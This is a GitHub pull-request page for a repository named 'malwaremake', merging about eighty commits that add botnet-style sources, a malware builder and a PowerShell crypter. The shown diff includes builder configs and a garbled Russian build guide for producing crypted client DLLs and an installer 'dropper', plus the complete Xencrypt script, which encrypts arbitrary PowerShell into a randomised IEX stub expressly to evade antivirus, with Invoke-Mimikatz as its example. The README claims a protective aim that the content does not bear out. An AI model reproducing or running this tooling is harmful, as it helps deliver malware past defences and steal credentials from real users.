Skip to content

master_class_startup #14

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 80 commits into from
Jul 6, 2023
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
80 commits
Select commit Hold shift + click to select a range
56acb75
Create c-cpp.yml
1proprogrammerchant May 25, 2023
5cb7965
Delete c-cpp.yml
1proprogrammerchant May 25, 2023
4f3ad7f
Create checker.py
devco22 May 26, 2023
c5eef89
Merge pull request #5 from 1proprogrammerchant/devco22-patch-1
1proprogrammerchant May 26, 2023
05890aa
Create codeql.yml
1proprogrammerchant May 26, 2023
5b50b7b
Create attack.c
devco22 May 26, 2023
5cdc75e
Delete codeql.yml
devco22 May 26, 2023
7c89c45
Create server.c
1proprogrammerchant May 26, 2023
78bd87b
Create binary.h
devco22 May 26, 2023
9e535e2
Create connection.h
devco22 May 26, 2023
e93eff7
Create server.h
1proprogrammerchant May 26, 2023
19f5e8a
Create include.h
1proprogrammerchant May 26, 2023
be027a7
Create telnet_info.h
devco22 May 26, 2023
965cd8d
Create util.h
1proprogrammerchant May 26, 2023
bc1d9c0
Create binary.c
1proprogrammerchant May 26, 2023
bb5fa4c
Create connection.c
1proprogrammerchant May 26, 2023
b2726d6
Create main.c
devco22 May 26, 2023
4bdf123
Create telnet_info.c
devco22 May 26, 2023
a49c8ff
Create util.c
devco22 May 26, 2023
0403ecc
Create build.debug.sh
1proprogrammerchant May 26, 2023
f57d866
Create build.sh
1proprogrammerchant May 26, 2023
5dafc48
Create attack_app.c
devco22 May 26, 2023
87a178a
Create attack_gre.c
1proprogrammerchant May 26, 2023
4668e75
Create attack_tcp.c
1proprogrammerchant May 26, 2023
1b8ed35
Create attack_udp.c
devco22 May 26, 2023
8990033
Create checksum.c
1proprogrammerchant May 26, 2023
d07b8a7
Create checksum.h
devco22 May 26, 2023
fc7516a
Create includes.h
devco22 May 26, 2023
1c8d777
Create killer.c
devco22 May 26, 2023
86f9385
Create killer.h
devco22 May 26, 2023
46c866a
Create main.c
1proprogrammerchant May 26, 2023
c6f90ad
Create protocol.h
1proprogrammerchant May 26, 2023
ea0f264
Create rand.c
1proprogrammerchant May 26, 2023
8398fe1
Create rand.h
devco22 May 26, 2023
ee558fe
Create resolve.c
1proprogrammerchant May 26, 2023
cc23b02
Create resolv.h
devco22 May 26, 2023
e840545
Rename resolve.c to resolv.c
devco22 May 26, 2023
3f83310
Create scanner.c
1proprogrammerchant May 26, 2023
8a85adb
Create scanner.h
1proprogrammerchant May 26, 2023
af3aa83
Create table.c
devco22 May 26, 2023
020a1aa
Create table.h
devco22 May 26, 2023
77f594d
Create util.c
devco22 May 26, 2023
6b59a55
Create util.h
1proprogrammerchant May 26, 2023
c0deb31
Create admin.go
1proprogrammerchant May 26, 2023
6af594d
Create api.go
1proprogrammerchant May 26, 2023
b4e2f23
Create attack.go
1proprogrammerchant May 26, 2023
38e1968
Create bot.go
devco22 May 26, 2023
59f0ee5
Create clientList.go
1proprogrammerchant May 26, 2023
856ecda
Create constants.go
1proprogrammerchant May 26, 2023
93a32ae
Create database.go
devco22 May 26, 2023
4455457
Create main.go
1proprogrammerchant May 26, 2023
80014f7
Create build.sh
devco22 May 26, 2023
23a17d4
Create prompt.txt
devco22 May 26, 2023
428d99b
Create ForumPost😉.txt
devco22 May 26, 2023
0e8a840
Create AcDll.vcproj
devco22 May 26, 2023
e774ca3
Create activdll.c
1proprogrammerchant May 26, 2023
014007c
Create activdll.h
1proprogrammerchant May 26, 2023
eea61b8
Create image.c
1proprogrammerchant May 26, 2023
9316cac
Create stubs.c
1proprogrammerchant May 26, 2023
27bcb7f
Create bcclient.c
devco22 May 26, 2023
1feefb2
Create bcclient.h
devco22 May 26, 2023
b262b89
Create bcclient.vcproj
devco22 May 26, 2023
f9ba7ad
Create xencrypt.ps1
1proprogrammerchant May 26, 2023
09e6ead
Add files via upload
1proprogrammerchant May 26, 2023
e1a159e
Add files via upload
1proprogrammerchant May 26, 2023
960ebea
Create set
1proprogrammerchant May 26, 2023
6d7b08f
the malware
1proprogrammerchant May 26, 2023
18b832d
Create build.bat
1proprogrammerchant May 26, 2023
9c5a8ac
Create build.txt
1proprogrammerchant May 26, 2023
63b75f9
Create client32.cfg
1proprogrammerchant May 26, 2023
7e3a533
Create client64.cfg
1proprogrammerchant May 26, 2023
360b60d
Create dll.cfg
1proprogrammerchant May 26, 2023
2f360ff
Create installer.bat
1proprogrammerchant May 26, 2023
70cfce2
Create installer.cfg
1proprogrammerchant May 26, 2023
8104967
Update README.md
1proprogrammerchant May 26, 2023
ddae41a
Update README.md
1proprogrammerchant May 26, 2023
7361692
Update README.md
1proprogrammerchant May 26, 2023
0d829e0
Update xencrypt.ps1
1proprogrammerchant Jun 29, 2023
dd85fab
Merge pull request #12 from 1proprogrammerchant/main
1proprogrammerchant Jul 6, 2023
8d777e3
Merge pull request #13 from 1proprogrammerchant/devco22-patch-1
1proprogrammerchant Jul 6, 2023
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Binary file added Builder/FJ.exe
Binary file not shown.
6 changes: 6 additions & 0 deletions Builder/build.bat
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
MD Release

fj client32.cfg
fj client64.cfg
fj installer.cfg
fj dll.cfg
6 changes: 6 additions & 0 deletions Builder/build.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
1. Ðåäàêòèðóåì \client.ini, ïðîïèñûâàåì äîìåíû, ãðóïïó è òàéìèíãè.
2. Âûïîëíÿåì \builder\build.bat. Ïîëó÷àåì íà âûõîäå \bbuilder\Release\client32.dll è \builder\Release\client64.dll,
ãîòîâûå DLL-êè, ñîäåðæàùèå INI-ôàéë.
3. Êðèïòóåì DLL-êè.
4. Âûïîëíÿåì \builder\installer.bat. Ïîëó÷àåì íà âûõîäå \builder\Release\installer.exe - ãîòîâûé äðîïïåð,
ñîäåðæàùèé êðèïòîâàíûå DLL-êè.
4 changes: 4 additions & 0 deletions Builder/client32.cfg
Original file line number Diff line number Diff line change
@@ -0,0 +1,4 @@
SOURCE: ..\release(builder)\client.dll
BIN: ..\public.key
INI: ..\client.ini
OUT: release\client32.dll
4 changes: 4 additions & 0 deletions Builder/client64.cfg
Original file line number Diff line number Diff line change
@@ -0,0 +1,4 @@
SOURCE: ..\x64\release(builder)\client.dll
BIN: ..\public.key
INI: ..\client.ini
OUT: release\client64.dll
4 changes: 4 additions & 0 deletions Builder/dll.cfg
Original file line number Diff line number Diff line change
@@ -0,0 +1,4 @@
SOURCE: ..\Release(builder)\crm.dll
DLL: Release\client32.dll
DLL: Release\client64.dll
OUT: Release\installer.dll
1 change: 1 addition & 0 deletions Builder/installer.bat
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
fj installer.cfg
4 changes: 4 additions & 0 deletions Builder/installer.cfg
Original file line number Diff line number Diff line change
@@ -0,0 +1,4 @@
SOURCE: ..\release(builder)\crm.exe
DLL: release\client32.dll
DLL: release\client64.dll
OUT: Release\installer.exe
1 change: 1 addition & 0 deletions Builder/set
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@

9 changes: 9 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
@@ -1,2 +1,11 @@
# malwaremake
making malware to protect users from viruses and trojans
# byass
![bypass](https://github.com/1proprogrammerchant/malwaremake/assets/126305902/3bda3556-cf11-4825-965b-8467afe3e061)
the bypass is to find any sort of suspicious activity and malicious behaviours from the file
# checker
the checker is to check if the file is safe for the **CILENT** and to find out what does the application do to the user and what permissons the application must have
![fud](https://github.com/1proprogrammerchant/malwaremake/assets/126305902/dd916028-d1af-4fd3-a504-4d512492098c)
# Malware
the malware example file is in the Builder folder the checker is in simple raw code so far the file will be inputted soon same for the anti virus
![Malware](https://github.com/1proprogrammerchant/malwaremake/assets/126305902/e5831973-ccc4-4dde-8f0e-b3de68f57bf3)
Binary file added anti-virus/bypass.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added anti-virus/fud.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
198 changes: 198 additions & 0 deletions anti-virus/xencrypt.ps1
Original file line number Diff line number Diff line change
@@ -0,0 +1,198 @@
# Xencrypt - PowerShell crypter
#
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.

Set-StrictMode -Version Latest
$ErrorActionPreference = "Stop"
$PSDefaultParameterValues['*:ErrorAction']='Stop'

function Create-Var() {
#Variable length help vary the length of the file generated
#old: [guid]::NewGuid().ToString().Substring(24 + (Get-Random -Maximum 9))
$set = "abcdefghijkmnopqrstuvwxyz"
(1..(4 + (Get-Random -Maximum 6)) | %{ $set[(Get-Random -Minimum 0 -Maximum $set.Length)] } ) -join ''
}

function Invoke-Xencrypt {
<#
.SYNOPSIS

Invoke-Xencrypt takes any PowerShell script as an input and both packs and encrypts it to evade AV. It also lets you layer this recursively however many times you want in order to foil dynamic & heuristic detection.

.DESCRIPTION

Invoke-Xencrypt takes any PowerShell script as an input and both packs and encrypts it to evade AV.
The output script is highly randomized in order to make static analysis even more difficut.
It also lets you layer this recursively however many times you want in order to attempt to foil dynamic & heuristic detection.


.PARAMETER InFile
Specifies the script to obfuscate/encrypt.

.PARAMETER OutFile
Specifies the output script.

.PARAMETER Iterations
The number of times the PowerShell script will be packed & crypted recursively. Default is 2.

.EXAMPLE

PS> Invoke-Xencrypt -InFile Invoke-Mimikatz.ps1 -OutFile banana.ps1 -Iterations 3

.LINK

https://github.com/the-xentropy/xencrypt

#>

[CmdletBinding()]
Param (
[Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
[string] $infile = $(Throw("-InFile is required")),
[Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
[string] $outfile = $(Throw("-OutFile is required")),
[Parameter(Mandatory=$false,ValueFromPipeline,ValueFromPipelineByPropertyName)]
[string] $iterations = 2
)
Process {
Write-Output "
Xencrypt Copyright (C) 2020 Xentropy ( @SamuelAnttila )
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions.
"

# read
Write-Output "[*] Reading '$($infile)' ..."
$codebytes = [System.IO.File]::ReadAllBytes($infile)


for ($i = 1; $i -le $iterations; $i++) {
# Decide on encryption params ahead of time

Write-Output "[*] Starting code layer ..."
$paddingmodes = 'PKCS7','ISO10126','ANSIX923','Zeros'
$paddingmode = $paddingmodes | Get-Random
$ciphermodes = 'ECB','CBC'
$ciphermode = $ciphermodes | Get-Random

$keysizes = 128,192,256
$keysize = $keysizes | Get-Random

$compressiontypes = 'Gzip','Deflate'
$compressiontype = $compressiontypes | Get-Random

# compress
Write-Output "[*] Compressing ..."
[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
if ($compressiontype -eq "Gzip") {
$compressionStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
} elseif ( $compressiontype -eq "Deflate") {
$compressionStream = New-Object System.IO.Compression.DeflateStream $output, ([IO.Compression.CompressionMode]::Compress)
}
$compressionStream.Write( $codebytes, 0, $codebytes.Length )
$compressionStream.Close()
$output.Close()
$compressedBytes = $output.ToArray()

# generate key
Write-Output "[*] Generating encryption key ..."
$aesManaged = New-Object "System.Security.Cryptography.AesManaged"
if ($ciphermode -eq 'CBC') {
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
} elseif ($ciphermode -eq 'ECB') {
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::ECB
}

if ($paddingmode -eq 'PKCS7') {
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
} elseif ($paddingmode -eq 'ISO10126') {
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::ISO10126
} elseif ($paddingmode -eq 'ANSIX923') {
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::ANSIX923
} elseif ($paddingmode -eq 'Zeros') {
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
}

$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
$aesManaged.GenerateKey()
$b64key = [System.Convert]::ToBase64String($aesManaged.Key)

# encrypt
Write-Output "[*] Encrypting ..."
$encryptor = $aesManaged.CreateEncryptor()
$encryptedData = $encryptor.TransformFinalBlock($compressedBytes, 0, $compressedBytes.Length);
[byte[]] $fullData = $aesManaged.IV + $encryptedData
$aesManaged.Dispose()
$b64encrypted = [System.Convert]::ToBase64String($fullData)

# write
Write-Output "[*] Finalizing code layer ..."

# now, randomize the order of any statements that we can to further increase variation

$stub_template = ''

$code_alternatives = @()
$code_alternatives += '${2} = [System.Convert]::FromBase64String("{0}")' + "`r`n"
$code_alternatives += '${3} = [System.Convert]::FromBase64String("{1}")' + "`r`n"
$code_alternatives += '${4} = New-Object "System.Security.Cryptography.AesManaged"' + "`r`n"
$code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
$stub_template += $code_alternatives_shuffled -join ''

$code_alternatives = @()
$code_alternatives += '${4}.Mode = [System.Security.Cryptography.CipherMode]::'+$ciphermode + "`r`n"
$code_alternatives += '${4}.Padding = [System.Security.Cryptography.PaddingMode]::'+$paddingmode + "`r`n"
$code_alternatives += '${4}.BlockSize = 128' + "`r`n"
$code_alternatives += '${4}.KeySize = '+$keysize + "`n" + '${4}.Key = ${3}' + "`r`n"
$code_alternatives += '${4}.IV = ${2}[0..15]' + "`r`n"
$code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
$stub_template += $code_alternatives_shuffled -join ''

$code_alternatives = @()
$code_alternatives += '${6} = New-Object System.IO.MemoryStream(,${4}.CreateDecryptor().TransformFinalBlock(${2},16,${2}.Length-16))' + "`r`n"
$code_alternatives += '${7} = New-Object System.IO.MemoryStream' + "`r`n"
$code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
$stub_template += $code_alternatives_shuffled -join ''


if ($compressiontype -eq "Gzip") {
$stub_template += '${5} = New-Object System.IO.Compression.GzipStream ${6}, ([IO.Compression.CompressionMode]::Decompress)' + "`r`n"
} elseif ( $compressiontype -eq "Deflate") {
$stub_template += '${5} = New-Object System.IO.Compression.DeflateStream ${6}, ([IO.Compression.CompressionMode]::Decompress)' + "`r`n"
}
$stub_template += '${5}.CopyTo(${7})' + "`r`n"

$code_alternatives = @()
$code_alternatives += '${5}.Close()' + "`r`n"
$code_alternatives += '${4}.Dispose()' + "`r`n"
$code_alternatives += '${6}.Close()' + "`r`n"
$code_alternatives += '${8} = [System.Text.Encoding]::UTF8.GetString(${7}.ToArray())' + "`r`n"
$code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
$stub_template += $code_alternatives_shuffled -join ''

$stub_template += ('Invoke-Expression','IEX' | Get-Random)+'(${8})' + "`r`n"


# it's ugly, but it beats concatenating each value manually.
$code = $stub_template -f $b64encrypted, $b64key, (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var)
$codebytes = [System.Text.Encoding]::UTF8.GetBytes($code)
}
Write-Output "[*] Writing '$($outfile)' ..."
[System.IO.File]::WriteAllText($outfile,$code)
Write-Output "[+] Done!"
}
}
Loading